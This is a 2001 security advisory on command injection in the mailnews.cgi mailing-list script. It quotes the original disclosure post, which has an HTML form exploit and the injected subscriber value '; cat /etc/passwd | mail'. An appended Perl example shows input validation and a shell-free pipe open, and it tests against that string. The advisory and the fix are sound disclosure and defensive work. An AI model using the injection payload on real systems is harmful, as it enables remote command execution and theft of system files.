


Category:   Application (Web Server/CGI)  >   Mailnews
Vendors:   Reuter, Claude
Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID:  1000949
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Feb 28 2001
Original Entry Date:  Feb 21 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, 1.3
Description:   The CGI-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow a remote attacker to supply shell commands that the CGI script will execute.

Potentially the most serious vulnerability is that the software does not appropriately filter certain input parameters, so an attacker can supply arbitrary shell commands that the CGI script then executes. In addition, the script does not properly protect and enforce passwords, so an unauthorized user who does not know the administrative password can add or delete users from an affected mailing list.

The original message contains demonstration exploit code.

Impact:   An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)
Underlying OS Comments:  Vulnerable target is a Perl script

Message History:   None.

 Source Message Contents

Subject:  CGI - mailnews.cgi vulnerability...

Hello BuGReaders...

##Script: mailnews.cgi


<cat from source>
This script helps you to maintain a mailinglist.

##Tested Version: 1.1, 1.3

The author doesn't parse some characters and he uses a very stupid "password
protection". We can add or delete users from the maillist without knowing the
admin password. But this is a small problem ;] . Let's see what we can do
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail' and use subroutine to execute this code :]

Simple exploit in html:

<INPUT type=hidden NAME="action" value="subscribe">
User to add with ;  [ex:" ; cat /etc/passwd |mail"
without quotes ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<A HREF="">
Execute command :] </A>
<CENTER> Peace... </CENTER>

Who :	Kanedaaa

***$$$###  " And maybe a great many won't understand these words...
		But there is no mercy for SONS OF BITCHES .... " ###$$* Hero ... Boss ... Abuser ... Cucumber Team Member... Bzz..
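
A defensive counterpart to the `open (MAIL, "|$mailprog $member")` call quoted in the message above, as an added example that is not part of the advisory, the original message or mailnews.cgi itself: it validates the subscriber address against an allowlist and opens the mail pipe in list form so no shell parses the address. The function names, the address pattern, the sendmail path and the stand-in mail program are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Allowlist check (an assumption, stricter than RFC 5322): no whitespace,
# no shell metacharacters, and no leading '-' that could be read as an option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

# List-form pipe open: each element reaches exec() as its own argv entry,
# so /bin/sh never parses $member. '--' ends option parsing in the mailer.
# Needs Perl 5.8+ on a Unix-like system.
sub send_to_member {
    my ($cmd, $member, $body) = @_;    # $cmd is an array ref
    die "rejected address\n" unless valid_address($member);
    open(my $mail, '|-', @$cmd, '--', $member)
        or die "Can't run $cmd->[0]: $!\n";
    print {$mail} $body;
    close($mail) or die "$cmd->[0] exited with status $?\n";
    return 1;
}

# Stand-in for sendmail so the demo runs offline: it prints its recipient
# argument and the message it receives on STDIN. A real deployment would pass
# something like ['/usr/sbin/sendmail', '-oi'] (hypothetical path).
my @mailprog = ($^X, '-e', 'print "recipient: [$ARGV[0]]\n"; print while <STDIN>;');

# Constructed sample input; the second entry is the string from the message.
my @samples = (
    'alice@example.org',
    '; cat /etc/passwd | mail',
    '-x@example.org',
    "bob\@example.org\n",
);

$| = 1;
for my $member (@samples) {
    (my $shown = $member) =~ s/\n/\\n/g;
    if (eval { send_to_member(\@mailprog, $member, "Subject: news\n\nhello\n") }) {
        print "sent: $shown\n";
    } else {
        chomp(my $err = $@);
        print "refused: $shown ($err)\n";
    }
}
```

The same validation belongs at subscribe time as well, so that a malformed address never reaches the users file that `$member` is later read from.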

